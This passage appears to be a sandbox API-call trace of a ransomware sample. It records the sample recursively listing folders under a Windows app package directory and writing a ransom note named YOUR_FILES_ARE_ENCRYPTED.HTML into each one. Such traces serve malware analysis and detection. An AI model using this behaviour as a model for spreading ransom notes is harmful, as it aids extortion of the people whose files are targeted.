cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0119.792] GetProcessHeap () returned 0x600000 [0119.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.793] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.796] CloseHandle (hObject=0x324) returned 1 [0119.796] GetProcessHeap () returned 0x600000 [0119.796] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.796] GetProcessHeap () returned 0x600000 [0119.796] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.796] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6cb00b48, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.796] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.796] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft") returned 113 [0119.796] GetProcessHeap () returned 0x600000 [0119.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.796] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft" [0119.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\*" [0119.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6cb00b48, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6cb00b48, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6cb00b48, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="Windows", cAlternateFileName="")) returned 1 [0119.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6cb00b48, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="Windows", cAlternateFileName="")) returned 0 [0119.797] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.797] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0119.797] GetProcessHeap () returned 0x600000 [0119.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.798] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.800] CloseHandle (hObject=0x324) returned 1 [0119.800] GetProcessHeap () returned 0x600000 [0119.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.800] GetProcessHeap () returned 0x600000 [0119.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.800] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.800] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.800] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned 108 [0119.800] GetProcessHeap () returned 0x600000 [0119.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.800] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp" [0119.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*" [0119.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.800] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.800] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.801] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.801] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0119.801] GetProcessHeap () returned 0x600000 [0119.801] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.802] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.803] CloseHandle (hObject=0x324) returned 1 [0119.804] GetProcessHeap () returned 0x600000 [0119.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.805] GetProcessHeap () returned 0x600000 [0119.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.806] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.806] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.806] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0119.806] GetProcessHeap () returned 0x600000 [0119.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.808] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.809] CloseHandle (hObject=0x320) returned 1 [0119.810] GetProcessHeap () returned 0x600000 [0119.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.810] GetProcessHeap () returned 0x600000 [0119.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.810] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.810] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.810] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData") returned 108 [0119.810] GetProcessHeap () returned 0x600000 [0119.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.810] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData" [0119.810] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\*" [0119.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.810] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.810] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0119.810] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.810] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0119.810] GetProcessHeap () returned 0x600000 [0119.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.812] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.814] CloseHandle (hObject=0x320) returned 1 [0119.814] GetProcessHeap () returned 0x600000 [0119.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.814] GetProcessHeap () returned 0x600000 [0119.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.815] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.815] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.815] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache") returned 111 [0119.815] GetProcessHeap () returned 0x600000 [0119.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.816] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache" [0119.816] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\*" [0119.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.817] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.817] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0119.817] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.817] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0119.817] GetProcessHeap () returned 0x600000 [0119.817] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.819] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, 